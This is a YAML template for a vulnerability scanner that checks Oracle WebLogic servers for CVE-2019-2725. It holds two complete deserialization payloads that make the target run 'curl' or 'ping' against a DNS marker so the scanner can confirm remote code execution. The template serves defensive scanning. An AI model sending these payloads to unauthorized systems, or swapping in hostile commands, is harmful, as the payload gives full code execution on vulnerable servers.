CVE-2019-2725.yaml

send:
  - method: 'POST'
    url: '/_async/AsyncResponseServiceHttps'
    headers:
      - CONTENT-TYPE: text/xml
    body: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://DNS_MARKER </string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'

  - method: 'POST'
    url: '/_async/AsyncResponseServiceHttps'
    headers:
      - CONTENT-TYPE: text/xml
    body: '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>ping DNS_MARKER </string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'

detect:
  - oob:
    - dns

meta-info:
  - type: rce
  - threat: 98
  - applicable_for:
    - fast
    - scanner
  - tags: 
    - RCE
    - Remote Code Execution
    - CVE-2019-2725
    - Oracle
    - Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0